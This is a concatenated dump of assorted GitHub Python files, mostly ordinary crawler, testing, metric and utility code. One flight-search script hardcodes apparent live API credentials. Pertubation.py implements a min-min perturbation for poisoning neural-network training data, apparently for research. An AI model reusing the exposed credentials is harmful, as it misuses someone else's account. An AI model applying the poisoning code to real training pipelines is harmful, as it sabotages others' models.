\"an_type\": \"中标结果公示\",\n            \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/gcjszbjggs/index.jhtml?areaCode=330231\"\n        },\n        {\n            \"an_sub\": \"NONE\",\n            \"an_major\": \"工程建设\",\n            \"an_type\": \"资格预审公告\",\n            \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/gcjszgysgg/index.jhtml?areaCode=330231\"\n        },\n        {\n            \"an_sub\": \"NONE\",\n            \"an_major\": \"其他交易\",\n            \"an_type\": \"成交结果公示\",\n            \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/gxcjjggs/index.jhtml?areaCode=330231\"\n        },\n        {\n            \"an_sub\": \"NONE\",\n            \"an_major\": \"其他交易\",\n            \"an_type\": \"招标公告\",\n            \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/qtjyzbgg/index.jhtml?areaCode=330231\"\n        }\n]\n}\n#National high-tech zone\n\n\ndef main():\n    return CRAWL_GUOJIAGAOXINQU_TASKS","repo_name":"nightqiuhua/bigCrawlers","sub_path":"wangban/wangban/work_urls/ningbo/guojiagaoxinqu.py","file_name":"guojiagaoxinqu.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"33518765453","text":"from flask import url_for\nfrom lib.tests import assert_status_with_message, ViewTestMixin\nfrom application.blueprints.users.models import 
User\n\n\n\nclass TestPosts(ViewTestMixin):\n def test_post_page(self,client):\n \"\"\"Post page should respond with a 200\"\"\"\n response = client.get(url_for('mypost.post'))\n assert response.status_code == 200\n\n def test_post_update_page(self,client):\n \"\"\"Post update page should respond with a 200\"\"\"\n response = client.get(url_for('mypost.update'))\n assert response.status_code == 200\n\n def test_post_delete_page(self,client):\n \"\"\"Post delete route should respond with a 200\"\"\"\n response = client.get(url_for('mypost.delete'))\n assert response.status_code == 200\n \n def test_post_form(self,client):\n \"\"\"Post form should redirect with a message\"\"\"\n form = {\n 'body':'Testing post form'\n }\n response = client.post(url_for('mypost.post'), data=form,\n follow_redirects=True)\n assert response.status_code == 200\n\n \n def test_post_update_form(self,client):\n \"\"\"Post update form should redirect with a message\"\"\"\n form = {\n 'body':'Testing post form'\n }\n response = client.post(url_for('mypost.update'), data=form,\n follow_redirects=True)\n assert response.status_code == 200\n","repo_name":"captain204/Socializer","sub_path":"tests/posts/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70106910295","text":"# Imports\nimport pandas as pd\nimport sklearn.metrics\nimport numpy as np\n\n\ndef samplewise_rand_index(y_true_df: pd.DataFrame, y_pred_df: pd.DataFrame) -> float:\n \"\"\"Compute the rand index for each sample in the dataset and then average it\"\"\"\n y_pred_df = y_pred_df.T\n y_true_df = y_true_df.T\n individual_rand_index = []\n for row_index in range(y_true_df.values.shape[0]):\n individual_rand_index.append(sklearn.metrics.adjusted_rand_score(y_true_df.values[row_index].ravel(), y_pred_df.values[row_index].ravel()))\n\n return np.mean(individual_rand_index)\n\n\n\n#The following lines show how the csv files are read\nif __name__ == '__main__':\n CSV_FILE_Y_TRUE = '--------.csv' # path of the y_true csv file\n CSV_FILE_Y_PRED = '--------.csv' # path of the y_pred csv file\n df_y_true = pd.read_csv(CSV_FILE_Y_TRUE, index_col=0, sep=',')\n df_y_pred = pd.read_csv(CSV_FILE_Y_PRED, index_col=0, sep=',')\n df_y_pred = df_y_pred.loc[df_y_true.index]\n print(samplewise_rand_index(df_y_true, df_y_pred))\n","repo_name":"thibautloiseau/mips","sub_path":"examples/samplewise_rand_index_transpose.py","file_name":"samplewise_rand_index_transpose.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71544278614","text":"import copy\n\nimport hypothesis.strategies as st\nimport numpy as np\nfrom hypothesis import given\nfrom strategies import data\n\nimport provenance as p\nimport provenance.artifact_hasher as ah\nfrom provenance.hashing import hash\n\n\n@given(data)\ndef test_shallow_and_deep_copies_hashing(o):\n original_hash = hash(o)\n shallow_copy = copy.copy(o)\n deep_copy = copy.deepcopy(o)\n assert hash(shallow_copy) == original_hash\n assert hash(deep_copy) == original_hash\n\n\n@given(st.data())\ndef test_shared_values_hashing(base_data):\n base_data = base_data.draw(data)\n base_copy = lambda: copy.deepcopy(base_data)\n\n shared_dict = {'a': base_data, 'b': base_data}\n without_sharing_dict = {'a': base_copy(), 'b': base_copy()}\n\n assert hash(shared_dict) == hash(without_sharing_dict)\n\n shared_tuple = 
(base_data, base_data)\n without_sharing_tuple = (base_copy(), base_copy())\n\n assert hash(shared_tuple) == hash(without_sharing_tuple)\n\n shared_list = [base_data, base_data]\n without_sharing_list = [base_copy(), base_copy()]\n\n assert hash(shared_list) == hash(without_sharing_list)\n\n\ndef test_hash_of_contiguous_array_is_the_same_as_noncontiguous():\n a = np.asarray(np.arange(6000).reshape((1000, 2, 3)), order='F')[:, :1, :]\n b = np.ascontiguousarray(a)\n assert hash(a) == hash(b)\n\n\ndef test_hash_of_fortran_array_is_the_same_as_c_array():\n c = np.asarray(np.arange(6000).reshape((1000, 2, 3)), order='C')\n f = np.asarray(np.arange(6000).reshape((1000, 2, 3)), order='F')\n\n assert hash(c) == hash(f)\n\n\ndef test_hashing_of_functions():\n\n def foo(a, b):\n return a + b\n\n assert hash(foo) == hash(foo)\n\n\ndef test_hashing_of_artifacts_and_proxies(repo):\n\n @p.provenance()\n def load_data():\n return [1, 2, 3]\n\n original_proxy = load_data()\n original_artifact = original_proxy.artifact\n loaded_artifact = repo.get_by_id(original_artifact.id)\n loaded_proxy = loaded_artifact.proxy()\n\n # All artifacts should have the same hash\n assert hash(original_artifact) == hash(loaded_artifact)\n\n # All proxies should have the same hash\n assert hash(original_proxy) == hash(loaded_proxy)\n\n # All values should have the same hash\n assert hash(original_artifact.value) == hash(loaded_artifact.value)\n\n # Artifacts and proxies should not have the same hash\n assert hash(original_artifact) != hash(original_proxy)\n\n # Proxies and values should have the same hash\n assert hash(original_proxy) == hash(original_artifact.value)\n\n\ndef test_hashing_with_artifact_hasher_also_returns_iter_of_artifacts_preserves_hash(repo,):\n\n @p.provenance()\n def load_data():\n return [1, 2, 3]\n\n @p.provenance()\n def create_composite(data):\n return {'foo': 'bar', 'data': data}\n\n data = load_data()\n\n original_proxy = create_composite(data)\n original_artifact = original_proxy.artifact\n loaded_artifact = repo.get_by_id(original_artifact.id)\n loaded_proxy = loaded_artifact.proxy()\n\n expected_proxy_ids = frozenset((original_artifact.id, data.artifact.id))\n expected_artifact_ids = frozenset((original_artifact.id,))\n\n original_proxy_hash, artifacts = hash(original_proxy, hasher=ah.artifact_hasher())\n ids = frozenset(a.id for a in artifacts)\n assert original_proxy_hash == hash(original_proxy)\n assert ids == expected_proxy_ids\n\n original_artifact_hash, artifacts = hash(original_artifact, hasher=ah.artifact_hasher())\n ids = frozenset(a.id for a in artifacts)\n assert original_artifact_hash == hash(original_artifact)\n assert ids == expected_artifact_ids\n\n loaded_artifact_hash, artifacts = hash(loaded_artifact, hasher=ah.artifact_hasher())\n ids = frozenset(a.id for a in artifacts)\n assert loaded_artifact_hash == hash(loaded_artifact)\n assert ids == expected_artifact_ids\n\n loaded_proxy_hash, artifacts = hash(loaded_proxy, hasher=ah.artifact_hasher())\n ids = frozenset(a.id for a in artifacts)\n assert loaded_proxy_hash == hash(loaded_proxy)\n assert ids == expected_proxy_ids\n","repo_name":"bmabey/provenance","sub_path":"tests/provenance/test_hashing.py","file_name":"test_hashing.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"67"} +{"seq_id":"33201246057","text":"import sys\nreader = (s.rstrip() for s in sys.stdin)\ninput = reader.__next__\nimport math\nfrom functools import reduce\n\ndef 
factors(n): \n    return set(reduce(list.__add__, \n                ([i, n//i] for i in range(1, int(n**0.5) + 1) if n % i == 0)))\n\ndef countit(lst,lenr):\n    n=len(lst)\n    counter=0\n    if lenr>n:\n        return 0\n    else:\n        subcounter=0\n        for i in range(n):\n            if lst[i]==1:\n                subcounter+=1 \n            else:\n                if subcounter>=lenr:\n                    counter+=(subcounter-lenr+1)\n                subcounter=0\n            if i==n-1:\n                if subcounter>=lenr:\n                    counter+=(subcounter-lenr+1)\n        return counter\n#print(countit([1,1,1,1],3))\n    \nif __name__ == '__main__':\n    n,m,k = list(map(int,input().split()))\n    a1=list(map(int,input().split()))\n    a2=list(map(int,input().split()))\n##    res=[]\n##    for i in range(n):\n##        res.append(list(map(lambda x:x*a1[i],a2)))\n##    print(res)\n    factk=list(factors(k))\n    factk.sort()\n    recdimen=[]\n    for ele in factk:\n        if ele<=(k**0.5):\n            recdimen.append([ele,k//ele])\n        else:\n            break\n    res=0\n    #print(recdimen)\n    for dima,dimb in recdimen:\n        ta1,ta2=countit(a1,dima),countit(a2,dimb)\n        tb1,tb2=countit(a2,dima),countit(a1,dimb)\n\n        if dima==dimb:\n            res+=(ta1*ta2)\n        else:\n            res+=(ta1*ta2+tb1*tb2)\n    print(res)\n","repo_name":"marcus-aurelianus/codeforce","sub_path":"round626/subrect.py","file_name":"subrect.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"}
+{"seq_id":"8279323973","text":"import csv\n\n\ndef write_data_in_Data(filename):\n\n    with open(filename, 'w') as file:\n\n        file.write(','.join(titles)) # join the header tuple into a string with ',' separators\n\n        for line in data:\n            line = [str(i) for i in line]\n            line = ','.join(line)\n            file.write(line) # join each data tuple into a ','-separated string\n            file.write('\\n')\n\ndef insert(line):\n    if line not in data:\n        data.append(line)\n\ndef new_line_in_data():\n\n    new_line = tuple(input('Введите данные: ').split())\n\n    if new_line not in data:\n        data.append(new_line)\n\ndef read_from_Data(filename):\n\n    with open(filename, 'r') as file:\n\n        titles = tuple(file.readline().split(','))\n        data = []\n\n        for line in file:\n            line = tuple(line.split(','))\n            data.append(line)\n\n    return titles, data\n\nglobal data, titles\n\ntitles = ('User_Number', 'Nickname')\ndata = []\n\ntitles, data = read_from_Data('New_Data_Base.csv')\n\nnew_line_in_data()\n\nwrite_data_in_Data('New_Data_Base.csv')\n\nprint(data)","repo_name":"KirillBikbaev/Another_Student_Repo","sub_path":"New_Data_Base.py","file_name":"New_Data_Base.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"41525149641","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# author: raosiwei\n# date: 2016-01-23\n\nimport sys\nsys.path.append(\"./src\")\nimport iData,iCalculate,iAnalysis\n\nidata = iData.iData(\"./conf\", \"./log\", \"./data\")\nidata.dataProcessing()\n\nical = iCalculate.iCalculate(\"./conf\", \"./log\")\nical.calIndicators()\n\nianaly = iAnalysis.iAnalysis(\"./conf\", \"./log\")\nianaly.runAnalysis()\n\n","repo_name":"rouseway/iStock","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"71313747093","text":"# web frameworks\nfrom flask import Flask\nfrom to_get_instances import Ec2Services\nfrom flask import request, jsonify\nimport json\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n    return \"Hello World\"\n\n# POST http://127.0.0.1:5000/startec2\n# Request Headers\n# Content-Type: 
application/json\n# User-Agent: PostmanRuntime/7.26.8\n# Accept: */*\n# Postman-Token: f5a46fc4-c97a-4689-be9f-063798d0563b\n# Host: 127.0.0.1:5000\n# Accept-Encoding: gzip, deflate, br\n# Connection: keep-alive\n# Request Body\n# {\"name\":\"kuna\"}\n@app.route('/startec2', methods=['POST'])\ndef start_instance():\n record = json.loads(request.data)\n print(record.get(\"name\", \"user hasn't given name\"))\n trigger_aws = Ec2Services(\"name\", \"filter\")\n instance_id = trigger_aws.create_ec2_instance()\n json_response = {\"instance_id\": str(instance_id.id)}\n return jsonify(json_response)\n\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()","repo_name":"girwarkishor/python-devops","sub_path":"class27/flask_tutorial.py","file_name":"flask_tutorial.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"5720550237","text":"from selenium import webdriver\ndriver=webdriver.Chrome()\ndriver.get(\"https://www.facebook.com/\")\ndriver.maximize_window()\ndriver.implicitly_wait(30)\n\n# ele_val=driver.find_element_by_id(\"email\").get_attribute(\"data-testid\")\n# print(ele_val)\n# print(type(ele_val))\n\nele_val=driver.find_element_by_xpath(\"//*[@class='login_form_label_field']/div/a\").text\nprint(ele_val)\nprint(type(ele_val))\n","repo_name":"ruhig24/PythonPractice1111","sub_path":"get_attribute.py","file_name":"get_attribute.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42573316353","text":"import numpy as np\nimport torch\nfrom torch.autograd import Variable\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\nimport options\nargs = options.options()\n\nfrom estimation import grad_estimator\n\nclass PerturbationTool():\n def __init__(self, seed=0, epsilon=0.03137254901, num_steps=20, step_size=0.00784313725):\n self.epsilon = epsilon\n self.num_steps = num_steps\n self.step_size = step_size\n self.seed = seed\n np.random.seed(seed)\n\n def random_noise(self, noise_shape=[20, 3, 32, 32]):\n random_noise = torch.FloatTensor(*noise_shape).uniform_(-self.epsilon, self.epsilon).to(device)\n return random_noise\n\n def min_min_attack(self, images, labels, model, optimizer, criterion, ZO_method=False, random_noise=None, sample_wise=False):\n if random_noise is None:\n random_noise = torch.FloatTensor(*images.shape).uniform_(-self.epsilon, self.epsilon).to(device)\n\n perturb_img = Variable(images.data + random_noise, requires_grad=True)\n perturb_img = Variable(torch.clamp(perturb_img, 0, 1), requires_grad=True)\n eta = random_noise\n for _ in range(self.num_steps):\n opt = torch.optim.SGD([perturb_img], lr=1e-3)\n opt.zero_grad()\n model.zero_grad()\n \n if ZO_method:\n mu = 0.01 #smoothing parameter\n q = 10 #no of random directions\n estimator = grad_estimator(model, labels, images.shape)\n \n images = images.view(args.batch_size, -1)\n d = args.batch_size*images.shape[1]\n perturb_img_grad = estimator.grad_est(images, mu, q, d)\n\n else:\n if isinstance(criterion, torch.nn.CrossEntropyLoss):\n if hasattr(model, 'classify'):\n model.classify = True\n logits = model(perturb_img)\n loss = criterion(logits, labels)\n else:\n logits, loss = criterion(model, perturb_img, labels, optimizer)\n perturb_img.retain_grad()\n loss.backward()\n perturb_img_grad = perturb_img.grad.data\n\n\n eta = self.step_size * perturb_img_grad.sign() * (-1) \n perturb_img = 
Variable(perturb_img.data + eta, requires_grad=True) # torch.Size([512, 3, 32, 32])\n \n images.data = images.data.reshape(perturb_img.data.shape)\n eta = torch.clamp(perturb_img.data - images.data, -self.epsilon, self.epsilon)\n perturb_img = Variable(images.data + eta, requires_grad=True)\n perturb_img = Variable(torch.clamp(perturb_img, 0, 1), requires_grad=True)\n\n return perturb_img, eta\n \n","repo_name":"ABravoCode/Practical-Targeted-Clean-Label-Poisoning-Attacks-on-Deep-Neural-Nets","sub_path":"Pertubation.py","file_name":"Pertubation.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"14972850969","text":"from typing import Any, Callable, Dict\n\n\nclass memoize(object):\n def __init__(self, func: Callable[[int, int], int]):\n self.func = func\n self.cache: Dict[int, Dict[int, int]] = dict()\n\n def __call__(self, *args: Any, **kwds: Any) -> Any:\n m: int = args[0]\n n: int = args[1]\n if m in self.cache:\n if n in self.cache[m]:\n return self.cache[m][n]\n else:\n self.cache[m] = dict()\n value = self.func(m, n)\n self.cache[m][n] = value\n return value\n\n\n@memoize\ndef gridTraveller(m: int, n: int):\n if m <= 0 or n <= 0:\n return 0\n if m == 1 and n == 1:\n return 1\n return (gridTraveller(m - 1, n) + gridTraveller(m, n - 1))\n\n\nprint(gridTraveller(18, 18))\n","repo_name":"chakri68/leetcode","sub_path":"DynamicProgramming/gridTraveller.py","file_name":"gridTraveller.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17922675523","text":"# -*- coding: UTF-8 -*-\n\n# last edit:\n# 2023-03-20\n\nimport re\nimport json\nimport os, sys\nimport inspect\nimport xbmc, xbmcgui, xbmcvfs\ntry:\n from urlparse import urlparse, parse_qsl\n from urllib import quote_plus, unquote_plus\n from urllib2 import Request, urlopen\nexcept ImportError:\n from urllib.parse import urlparse, quote_plus, parse_qsl, unquote_plus\n from urllib.request import Request, urlopen\n\ndef download(name, image, url, subfolder=None): # new\n if url == None: return\n\n from resources.lib import control\n\n try: headers = dict(parse_qsl(url.rsplit('|', 1)[1]))\n except: headers = dict('')\n\n url = url.split('|')[0]\n content = re.compile('(.+?)\\sS(\\d*)E\\d*$').findall(name)\n\n if int(xbmc.getInfoLabel(\"System.BuildVersion\").split(\".\")[0]) >= 19:\n table = str.maketrans('', '', '\\/:*?\"<>|')\n transname = name.translate(table).strip('.')\n else:\n transname = name.translate(None, '\\/:*?\"<>|').strip('.')\n\n transname = transname.replace(' ', '_') # new\n\n levels =['../../../..', '../../..', '../..', '..']\n\n if len(content) == 0:\n dest = control.getSetting('download.movie.path', False)\n dest = control.translatePath(dest)\n for level in levels:\n try: control.makeFile(os.path.abspath(os.path.join(dest, level)))\n except: pass\n if not control.makeFile(dest):\n xbmcgui.Dialog().ok(name, dest + '[CR]ERROR - Server | Verzeichnis[CR]Download fehlgeschlagen')\n return\n\n # new\n if subfolder != None:\n dest = os.path.join(dest, subfolder)\n\n # if subfolder == None:\n # dest = os.path.join(dest, transname)\n # else:\n # dest = os.path.join(dest, subfolder)\n\n if not control.makeFile(dest):\n xbmcgui.Dialog().ok(name, dest + '[CR]ERROR - Server | Verzeichnis[CR]Download fehlgeschlagen')\n return\n else:\n dest = control.getSetting('download.tv.path', False)\n dest = control.translatePath(dest)\n for 
level in levels:\n try: control.makeFile(os.path.abspath(os.path.join(dest, level)))\n except: pass\n if not control.makeFile(dest):\n xbmcgui.Dialog().ok(name, dest + '[CR]ERROR - Server | Verzeichnis[CR]Download fehlgeschlagen')\n return\n\n if int(xbmc.getInfoLabel(\"System.BuildVersion\").split(\".\")[0]) >= 19:\n table = str.maketrans('', '', '\\/:*?\"<>|')\n transtvshowtitle = content[0][0].translate(table).strip('.')\n else:\n transtvshowtitle = content[0][0].translate(None, '\\/:*?\"<>|').strip('.')\n\n dest = os.path.join(dest, transtvshowtitle)\n if not control.makeFile(dest):\n xbmcgui.Dialog().ok(name, dest + '[CR]ERROR - Server | Verzeichnis[CR]Download fehlgeschlagen')\n return\n dest = os.path.join(dest, 'Season %01d' % int(content[0][1]))\n if not control.makeFile(dest):\n xbmcgui.Dialog().ok(name, dest + '[CR]ERROR - Server | Verzeichnis[CR]Download fehlgeschlagen')\n return\n\n ext = os.path.splitext(urlparse(url).path)[1][1:]\n if not ext in ['mp4', 'mkv', 'flv', 'avi', 'mpg']: ext = 'mp4'\n dest = os.path.join(dest, transname + '.' + ext)\n\n sysheaders = quote_plus(json.dumps(headers))\n sysurl = quote_plus(url)\n systitle = quote_plus(name)\n sysimage = quote_plus(image)\n sysdest = quote_plus(dest)\n script = inspect.getfile(inspect.currentframe())\n cmd = 'RunScript(%s, %s, %s, %s, %s, %s)' % (script, sysurl, sysdest, systitle, sysimage, sysheaders)\n xbmc.executebuiltin(cmd)\n\n\ndef getResponse(url, headers, size):\n try:\n if size > 0:\n size = int(size)\n headers['Range'] = 'bytes=%d-' % size\n\n req = Request(url, headers=headers)\n\n resp = urlopen(req, timeout=30)\n return resp\n except:\n return None\n\n\ndef done(title, dest, downloaded):\n playing = xbmc.Player().isPlaying()\n\n text = xbmcgui.Window(10000).getProperty('GEN-DOWNLOADED')\n\n if len(text) > 0:\n text += '[CR]'\n\n if downloaded:\n text += '%s : %s' % (dest.rsplit(os.sep)[-1], '[COLOR forestgreen]Download erfolgreich[/COLOR]')\n else:\n text += '%s : %s' % (dest.rsplit(os.sep)[-1], '[COLOR red]Download fehlgeschlagen[/COLOR]')\n\n xbmcgui.Window(10000).setProperty('GEN-DOWNLOADED', text)\n\n if (not downloaded) or (not playing): \n xbmcgui.Dialog().ok(title, text)\n xbmcgui.Window(10000).clearProperty('GEN-DOWNLOADED')\n\n\ndef doDownload(url, dest, title, image, headers):\n headers = json.loads(unquote_plus(headers))\n url = unquote_plus(url)\n title = unquote_plus(title)\n image = unquote_plus(image)\n dest = unquote_plus(dest)\n file = dest.rsplit(os.sep, 1)[-1]\n\n resp = getResponse(url, headers, 0)\n\n if not resp:\n xbmcgui.Dialog().ok(title, dest + '[CR]Download fehlgeschlagen[CR]Keine Antwort vom Server')\n return\n\n try: content = int(resp.headers['Content-Length'])\n except: content = 0\n\n try: resumable = 'bytes' in resp.headers['Accept-Ranges'].lower()\n except: resumable = False\n\n #print \"Download Header\"\n #print resp.headers\n #if resumable: print(\"Download is resumable\")\n\n if content < 1:\n xbmcgui.Dialog().ok(title, file + ' Unbekannte Dateigröße[CR]Download nicht möglich')\n return\n\n size = 1024 * 1024\n mb = content / (1024 * 1024)\n\n if content < size:\n size = content\n\n total = 0\n notify = 0\n errors = 0\n count = 0\n resume = 0\n sleep = 0\n\n if int(xbmc.getInfoLabel(\"System.BuildVersion\").split(\".\")[0]) >= 19:\n if xbmcgui.Dialog().yesno('Download - ' + title, '%s[CR]Dateigröße %dMB[CR]Weiter mit Download?' 
% (file, mb) , 'Weiter', 'Abbrechen') == 1: return\n else:\n if xbmcgui.Dialog().yesno('Download - ' + title, file, 'Dateigröße %dMB' % mb, 'Weiter mit Download?', 'Weiter', 'Abbrechen') == 1: return\n\n #print('Download File Size : %dMB %s ' % (mb, dest))\n\n #f = open(dest, mode='wb')\n f = xbmcvfs.File(dest, 'w')\n\n chunks = []\n while True:\n downloaded = total\n for c in chunks:\n downloaded += len(c)\n percent = min(100 * downloaded / content, 100)\n if percent >= notify:\n # xbmc.executebuiltin( \"Notification(%s,%s,%i,%s)\" % ( str(int(percent))+'%' + ' - ' + title, dest, 5000, image))\n xbmcgui.Dialog().notification(str(int(percent))+'%' + ' - ' + title, dest, image, 5000, False)\n #print('Download percent : %s %s %dMB downloaded : %sMB File Size : %sMB' % (str(int(percent))+'%', dest, mb, downloaded / 1000000, content / 1000000))\n notify += 20\n\n chunk = None\n error = False\n\n try: \n chunk = resp.read(size)\n if not chunk:\n if percent < 99:\n error = True\n else:\n while len(chunks) > 0:\n c = chunks.pop(0)\n f.write(c)\n del c\n\n f.close()\n #print('%s download complete' % (dest))\n return done(title, dest, True)\n\n except Exception as e:\n #print(str(e))\n error = True\n sleep = 10\n errno = 0\n\n if hasattr(e, 'errno'):\n errno = e.errno\n\n if errno == 10035: # 'A non-blocking socket operation could not be completed immediately'\n pass\n\n if errno == 10054: #'An existing connection was forcibly closed by the remote host'\n errors = 10 #force resume\n sleep = 30\n\n if errno == 11001: # 'getaddrinfo failed'\n errors = 10 #force resume\n sleep = 30\n\n if chunk:\n errors = 0\n chunks.append(chunk)\n if len(chunks) > 5:\n c = chunks.pop(0)\n f.write(c)\n total += len(c)\n del c\n\n if error:\n errors += 1\n count += 1\n #print('%d Error(s) whilst downloading %s' % (count, dest))\n xbmc.sleep(sleep*1000)\n\n if (resumable and errors > 0) or errors >= 10:\n if (not resumable and resume >= 50) or resume >= 500:\n #Give up!\n #print('%s download canceled - too many error whilst downloading' % (dest))\n return done(title, dest, False)\n\n resume += 1\n errors = 0\n if resumable:\n chunks = []\n #create new response\n #print('Download resumed (%d) %s' % (resume, dest))\n resp = getResponse(url, headers, total)\n else:\n #use existing response\n pass\n\n\nif __name__ == '__main__':\n if 'downloader.py' in sys.argv[0]:\n doDownload(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])\n\n\n","repo_name":"kasi45/plugin.video.mediathekviewweb","sub_path":"resources/lib/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":9046,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"41813899695","text":"from ising_model import *\n\ndef kernel():\n arr = np.zeros((11, 11))\n kernel = make_dist_kernel(arr, 1., )\n\n test = np.arange(11 * 11).reshape((11, 11))\n n_grid = np.array(test.shape)\n\n plt.matshow(test)\n plt.show()\n\n plt.matshow(kernel)\n plt.show()\n\n y, x = 10, 3\n\n test[x, y] = 200\n\n n_kernel = np.array(kernel.shape)\n stencil = np.nonzero(kernel) # - n_kernel // 2\n\n offsets = np.array([x, y]) - n_kernel // 2\n stencil = tuple([idxs + offset for idxs, offset in zip(stencil, offsets)])\n print(stencil)\n stencil = np.ravel_multi_index(stencil, test.shape, mode=\"wrap\")\n print(stencil)\n\n np.put(test, stencil, v=150)\n plt.matshow(test)\n plt.show()\n neighbour_spins = np.take(test, stencil)\n print(neighbour_spins)\n\n stencil = np.nonzero(kernel)\n offsets = 
np.array([x, y]) - n_kernel // 2\n _stencil = [idxs + offset for idxs, offset in zip(stencil, offsets)]\n\n print(_stencil)\n\n __stencil = [idxs % max_idx for idxs, max_idx in zip(_stencil, n_grid)]\n\n __stencil = __stencil[0] * n_grid[0] + __stencil[1]\n\n print(__stencil)\n\n # __stencil = (_stencil[0] % (n_grid[0] - 1)) * n_grid[0] + (_stencil[1] % (n_grid[1] - 1)) * n_grid[1]\n neighbour_spins = np.take(test, __stencil)\n\n print(neighbour_spins)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n kernel()\n","repo_name":"lwelzel/ising-model","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7194721488","text":"import requests\n\nprint(\"Please enter your Origin and Destination ?\")\nuserinput1=input(\"Enter your Origin: \");\nuserinput2=input(\"Enter your Destination: \");\n\nurl = \"https://travelpayouts-travelpayouts-flight-data-v1.p.rapidapi.com/v1/prices/cheap\"\n\nquerystring = {\"destination\":userinput1,\"origin\":userinput2,\"currency\":\"USD\",\"page\":\"None\"}\n\nheaders = {\n 'x-rapidapi-host': \"travelpayouts-travelpayouts-flight-data-v1.p.rapidapi.com\",\n 'x-rapidapi-key': \"83a69214c6msh70b62fd60e4fd1ep1a3f19jsn6b278bdadb79\",\n 'x-access-token': \"a4dd61ae0300a50da722075244ad7089\"\n }\n\nresponse = requests.get(url, headers=headers, params=querystring)\n\n\nprint(response.text)","repo_name":"nscharan1/API-s","sub_path":"FLIGHTINFO.py","file_name":"FLIGHTINFO.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3619208317","text":"#!/usr/bin/env python\n\nimport os, logging, argparse, re\nimport pandas as pd\nimport numpy as np\n\ndef getFiles(directory, prefix, suffix):\n fileList = []\n for f in os.listdir(os.path.abspath(directory)):\n fname, fext = os.path.splitext(f)\n if (f.startswith(prefix)) and (fext == ('.' + suffix)):\n fileList.append(f)\n return(fileList)\n\n\ndef makeTable(fileList):\n fileNestedList = []\n fileTable = pd.DataFrame()\n rule = re.compile('[RI][1-2]')\n for f in fileList:\n fname, fext = os.path.splitext(f)\n key = rule.search(f)\n short = f.replace(key.group(),\"\")\n row = {'filename' : f,\n 'type' : key.group(),\n 'shortname' : short}\n fileNestedList.append(row)\n fileTable = pd.DataFrame(fileNestedList)\n return(fileTable)\n\n\ndef checkDf(df):\n max_row, max_col = df.shape\n cols = df.columns.tolist()\n data = ['none' for i in range(max_row)]\n if len(cols) < 4:\n missing = list(set(['R1', 'R2', 'I1', 'I2']) - set(cols))\n for i in missing:\n if i == 'R1':\n df.insert(0, 'R1', data)\n elif i == 'R2':\n df.insert(1, 'R2', data)\n elif i == 'I1':\n df.insert(2, 'I1', data)\n elif i == 'I2':\n df.insert(3, 'I2', data)\n return(df)\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description = 'Make a list of the files to run in batch mode')\n parser.add_argument('-d', '--directory', metavar='', required=True, help = 'Specify the path to your files')\n parser.add_argument('-p', '--prefix', metavar='', required=True, help = 'A prefix that identifies the files you want to run')\n parser.add_argument('-x', '--extension', metavar='', required=True, help = 'An extension that your files have, e.g. 
gz (NOT .gz)')\n\n    args = parser.parse_args()\n\n    LOG_FORMAT = \"%(levelname)s %(asctime)s - %(message)s\"\n    logging.basicConfig(filename = os.path.abspath(args.directory) + '/make_file.log', format = LOG_FORMAT, level = logging.DEBUG)\n    logger = logging.getLogger()\n\n    logger.info(f\"Arguments passed: prefix = {args.prefix}, extension = {args.extension}\")\n    logger.info(f\"Retrieving files that start with {args.prefix} and end with {args.extension}\")\n\n    if args.directory == '.':\n        directory = os.getcwd()\n    else:\n        directory = args.directory\n\n    if not os.path.exists(directory):\n        logger.error(f\"Could not find the directory you specified: {directory}. Does it exist?\")\n    assert os.path.exists(directory), f\"Directory not found at {directory}\"\n\n    filetypes = ['R1', 'R2', 'I1', 'I2']\n    order = {key: i for i, key in enumerate(filetypes)}\n\n    fileList = getFiles(directory, args.prefix, args.extension)\n    fileTable = makeTable(fileList)\n    finalTable = fileTable.reset_index(drop = True) \\\n  